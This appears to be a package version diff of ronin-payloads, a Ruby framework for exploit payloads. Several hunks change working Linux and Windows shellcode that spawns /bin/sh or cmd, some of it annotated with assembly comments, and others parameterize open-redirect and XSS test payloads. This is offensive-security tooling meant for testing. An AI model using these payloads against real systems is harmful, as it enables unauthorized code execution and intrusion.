|
|
65
66
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -51,16 +52,16 @@ module Ronin
|
|
|
51
52
|
# Builds the shellcode.
|
|
52
53
|
#
|
|
53
54
|
def build
|
|
54
|
-
@payload = "\x48\x31\xd2"
|
|
55
|
-
"\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"
|
|
56
|
-
"\x48\xc1\xeb\x08"
|
|
57
|
-
"\x53"
|
|
58
|
-
"\x48\x89\xe7"
|
|
59
|
-
"\x50"
|
|
60
|
-
"\x57"
|
|
61
|
-
"\x48\x89\xe6"
|
|
62
|
-
"\xb0\x3b"
|
|
63
|
-
"\x0f\x05"
|
|
55
|
+
@payload = "\x48\x31\xd2" + # xor %rdx, %rdx
|
|
56
|
+
"\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" + # mov $0x68732f6e69622f2f, %rbx
|
|
57
|
+
"\x48\xc1\xeb\x08" + # shr $0x8, %rbx
|
|
58
|
+
"\x53" + # push %rbx
|
|
59
|
+
"\x48\x89\xe7" + # mov %rsp, %rdi
|
|
60
|
+
"\x50" + # push %rax
|
|
61
|
+
"\x57" + # push %rdi
|
|
62
|
+
"\x48\x89\xe6" + # mov %rsp, %rsi
|
|
63
|
+
"\xb0\x3b" + # mov $0x3b, %al
|
|
64
|
+
"\x0f\x05" # syscall
|
|
64
65
|
end
|
|
65
66
|
|
|
66
67
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -58,7 +59,7 @@ module Ronin
|
|
|
58
59
|
"\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" \
|
|
59
60
|
"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" \
|
|
60
61
|
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" \
|
|
61
|
-
"\x5f\x6a\x3b\x58\x0f\x05"
|
|
62
|
+
"\x5f\x6a\x3b\x58\x0f\x05"
|
|
62
63
|
end
|
|
63
64
|
|
|
64
65
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -55,7 +56,7 @@ module Ronin
|
|
|
55
56
|
@payload = "\x48\x31\xd2\x48\xc7\xc0\xf6\xff\xff\x01" \
|
|
56
57
|
"\x48\x83\xc0\x45\x5f\x52\x57\x48\x89\xe6" \
|
|
57
58
|
"\x0f\x05\xe8\xe5\xff\xff\xff\x2f\x62\x69" \
|
|
58
|
-
"\x6e\x2f\x2f\x73\x68"
|
|
59
|
+
"\x6e\x2f\x2f\x73\x68"
|
|
59
60
|
end
|
|
60
61
|
|
|
61
62
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -60,7 +61,7 @@ module Ronin
|
|
|
60
61
|
"\xe8\x08\x48\x31\xf6\x4c\x89\xc0\x4c\x89\xe7\x0f\x05\x48\x83" \
|
|
61
62
|
"\xfe\x02\x48\xff\xc6\x76\xef\x49\x83\xe8\x1f\x4c\x89\xc0\x48" \
|
|
62
63
|
"\x31\xd2\x49\xbd\xff\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xed" \
|
|
63
|
-
"\x08\x41\x55\x48\x89\xe7\x48\x31\xf6\x0f\x05"
|
|
64
|
+
"\x08\x41\x55\x48\x89\xe7\x48\x31\xf6\x0f\x05"
|
|
64
65
|
end
|
|
65
66
|
|
|
66
67
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -74,7 +75,7 @@ module Ronin
|
|
|
74
75
|
"\x01\x01\x01\x01" \
|
|
75
76
|
"\x02\x02\x02\x02" \
|
|
76
77
|
"\x03\x03\x03\x03" \
|
|
77
|
-
"\x9a\x04\x04\x04\x04\x07\x04"
|
|
78
|
+
"\x9a\x04\x04\x04\x04\x07\x04"
|
|
78
79
|
end
|
|
79
80
|
|
|
80
81
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -60,7 +61,7 @@ module Ronin
|
|
|
60
61
|
"\xef\xeb\x23\x5b\x89\x1f\x31\xc9\x88\x4b\x07\x89\x4f\x04\x51\x8d" \
|
|
61
62
|
"\x07\x50\x8b\x07\x50\x50\x31\xc0\xb0\x3b\xcd\x80\x31\xc9\x51\x51" \
|
|
62
63
|
"\x31\xc0\xb0\x01\xcd\x80\xe8\xd8\xff\xff\xff\x2f\x62\x69\x6e\x2f" \
|
|
63
|
-
"\x73\x68\x41\x90"
|
|
64
|
+
"\x73\x68\x41\x90"
|
|
64
65
|
end
|
|
65
66
|
|
|
66
67
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -52,18 +53,18 @@ module Ronin
|
|
|
52
53
|
# Builds the shellcode.
|
|
53
54
|
#
|
|
54
55
|
def build
|
|
55
|
-
@payload = "\x99"
|
|
56
|
-
"\x52"
|
|
57
|
-
"\x68\x6e\x2f\x73\x68"
|
|
58
|
-
"\x68\x2f\x2f\x62\x69"
|
|
59
|
-
"\x89\xe3"
|
|
60
|
-
"\x52"
|
|
61
|
-
"\x54"
|
|
62
|
-
"\x53"
|
|
63
|
-
"\x53"
|
|
64
|
-
"\x6a\x3b"
|
|
65
|
-
"\x58"
|
|
66
|
-
"\xcd\x80"
|
|
56
|
+
@payload = "\x99" + # cltd
|
|
57
|
+
"\x52" + # push %edx
|
|
58
|
+
"\x68\x6e\x2f\x73\x68" + # push $0x68732f6e
|
|
59
|
+
"\x68\x2f\x2f\x62\x69" + # push $0x69622f2f
|
|
60
|
+
"\x89\xe3" + # mov %esp,%ebx
|
|
61
|
+
"\x52" + # push %edx
|
|
62
|
+
"\x54" + # push %esp
|
|
63
|
+
"\x53" + # push %ebx
|
|
64
|
+
"\x53" + # push %ebx
|
|
65
|
+
"\x6a\x3b" + # push $0x3b
|
|
66
|
+
"\x58" + # pop %eax
|
|
67
|
+
"\xcd\x80" # int $0x80
|
|
67
68
|
end
|
|
68
69
|
|
|
69
70
|
end
|
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
# encoding: ASCII-8BIT
|
|
1
2
|
# frozen_string_literal: true
|
|
2
3
|
#
|
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
|
@@ -52,26 +53,26 @@ module Ronin
|
|
|
52
53
|
# Builds the shellcode.
|
|
53
54
|
#
|
|
54
55
|
def build
|
|
55
|
-
@payload = "\x31\xC9"
|
|
56
|
-
"\x64\x8B\x71\x30"
|
|
57
|
-
"\x8B\x76\x0C"
|
|
58
|
-
"\x8B\x76\x1C"
|
|
59
|
-
"\x8B\x36"
|
|
60
|
-
"\x8B\x06"
|
|
61
|
-
"\x8B\x68\x08"
|
|
62
|
-
"\xEB\x20"
|
|
63
|
-
"\x5B"
|
|
64
|
-
"\x53"
|
|
65
|
-
"\x55"
|
|
66
|
-
"\x5B"
|
|
67
|
-
"\x81\xEB\x11\x11\x11\x11"
|
|
68
|
-
"\x81\xC3\xDA\x3F\x1A\x11"
|
|
69
|
-
"\xFF\xD3"
|
|
70
|
-
"\x81\xC3\x11\x11\x11\x11"
|
|
71
|
-
"\x81\xEB\x8C\xCC\x18\x11"
|
|
72
|
-
"\xFF\xD3"
|
|
73
|
-
"\xE8\xDB\xFF\xFF\xFF"
|
|
74
|
-
"\x63\x6d\x64"
|
|
56
|
+
@payload = "\x31\xC9" + # xor ecx,ecx
|
|
57
|
+
"\x64\x8B\x71\x30" + # mov esi,[fs:ecx+0x30]
|
|
58
|
+
"\x8B\x76\x0C" + # mov esi,[esi+0xc]
|
|
59
|
+
"\x8B\x76\x1C" + # mov esi,[esi+0x1c]
|
|
60
|
+
"\x8B\x36" + # mov esi,[esi]
|
|
61
|
+
"\x8B\x06" + # mov eax,[esi]
|
|
62
|
+
"\x8B\x68\x08" + # mov ebp,[eax+0x8]
|
|
63
|
+
"\xEB\x20" + # jmp short 0x35
|
|
64
|
+
"\x5B" + # pop ebx
|
|
65
|
+
"\x53" + # push ebx
|
|
66
|
+
"\x55" + # push ebp
|
|
67
|
+
"\x5B" + # pop ebx
|
|
68
|
+
"\x81\xEB\x11\x11\x11\x11" + # sub ebx,0x11111111
|
|
69
|
+
"\x81\xC3\xDA\x3F\x1A\x11" + # add ebx,0x111a3fda (for seven X86 add ebx,0x1119f7a6)
|
|
70
|
+
"\xFF\xD3" + # call ebx
|
|
71
|
+
"\x81\xC3\x11\x11\x11\x11" + # add ebx,0x11111111
|
|
72
|
+
"\x81\xEB\x8C\xCC\x18\x11" + # sub ebx,0x1118cc8c (for seven X86 sub ebx,0x1114ccd7)
|
|
73
|
+
"\xFF\xD3" + # call ebx
|
|
74
|
+
"\xE8\xDB\xFF\xFF\xFF" + # call dword 0x15
|
|
75
|
+
"\x63\x6d\x64" # db "cmd"
|
|
75
76
|
end
|
|
76
77
|
|
|
77
78
|
end
|
|
@@ -37,11 +37,14 @@ module Ronin
|
|
|
37
37
|
Simply redirects to https://google.com/.
|
|
38
38
|
DESC
|
|
39
39
|
|
|
40
|
+
param :url, default: 'https://google.com/',
|
|
41
|
+
desc: 'The open redirect URL'
|
|
42
|
+
|
|
40
43
|
#
|
|
41
44
|
# Builds the Open Redirect test payload.
|
|
42
45
|
#
|
|
43
46
|
def build
|
|
44
|
-
@payload =
|
|
47
|
+
@payload = params[:url]
|
|
45
48
|
end
|
|
46
49
|
|
|
47
50
|
end
|
|
@@ -37,11 +37,14 @@ module Ronin
|
|
|
37
37
|
Simply calls `alert(1)`.
|
|
38
38
|
DESC
|
|
39
39
|
|
|
40
|
+
param :javascript, default: 'alert(1)',
|
|
41
|
+
desc: 'The JavaScript to inject'
|
|
42
|
+
|
|
40
43
|
#
|
|
41
44
|
# Builds the XSS test payload.
|
|
42
45
|
#
|
|
43
46
|
def build
|
|
44
|
-
@payload =
|
|
47
|
+
@payload = params[:javascript]
|
|
45
48
|
end
|
|
46
49
|
|
|
47
50
|
end
|
data/lib/ronin/payloads/cli.rb
CHANGED
|
@@ -20,6 +20,7 @@
|
|
|
20
20
|
#
|
|
21
21
|
|
|
22
22
|
require 'ronin/payloads/version'
|
|
23
|
+
require 'ronin/core/cli/help/banner'
|
|
23
24
|
|
|
24
25
|
require 'command_kit/commands'
|
|
25
26
|
require 'command_kit/commands/auto_load'
|
|
@@ -40,6 +41,7 @@ module Ronin
|
|
|
40
41
|
namespace: "#{self}::Commands"
|
|
41
42
|
)
|
|
42
43
|
include CommandKit::Options::Version
|
|
44
|
+
include Core::CLI::Help::Banner
|
|
43
45
|
|
|
44
46
|
command_name 'ronin-payloads'
|
|
45
47
|
version Ronin::Payloads::VERSION
|
metadata
CHANGED
|
@@ -1,14 +1,14 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: ronin-payloads
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.2.0
|
|
4
|
+
version: 0.2.0
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- Postmodern
|
|
8
8
|
autorequire:
|
|
9
9
|
bindir: bin
|
|
10
10
|
cert_chain: []
|
|
11
|
-
date: 2024-
|
|
11
|
+
date: 2024-07-22 00:00:00.000000000 Z
|
|
12
12
|
dependencies:
|
|
13
13
|
- !ruby/object:Gem::Dependency
|
|
14
14
|
name: ronin-support
|
|
@@ -58,14 +58,14 @@ dependencies:
|
|
|
58
58
|
requirements:
|
|
59
59
|
- - "~>"
|
|
60
60
|
- !ruby/object:Gem::Version
|
|
61
|
-
version: 0.2
|
|
61
|
+
version: '0.2'
|
|
62
62
|
type: :runtime
|
|
63
63
|
prerelease: false
|
|
64
64
|
version_requirements: !ruby/object:Gem::Requirement
|
|
65
65
|
requirements:
|
|
66
66
|
- - "~>"
|
|
67
67
|
- !ruby/object:Gem::Version
|
|
68
|
-
version: 0.2
|
|
68
|
+
version: '0.2'
|
|
69
69
|
- !ruby/object:Gem::Dependency
|
|
70
70
|
name: ronin-repos
|
|
71
71
|
requirement: !ruby/object:Gem::Requirement
|
|
@@ -309,7 +309,7 @@ required_rubygems_version: !ruby/object:Gem::Requirement
|
|
|
309
309
|
- !ruby/object:Gem::Version
|
|
310
310
|
version: '0'
|
|
311
311
|
requirements: []
|
|
312
|
-
rubygems_version: 3.
|
|
312
|
+
rubygems_version: 3.5.11
|
|
313
313
|
signing_key:
|
|
314
314
|
specification_version: 4
|
|
315
315
|
summary: A Ruby micro-framework for writing and running exploit payloads
|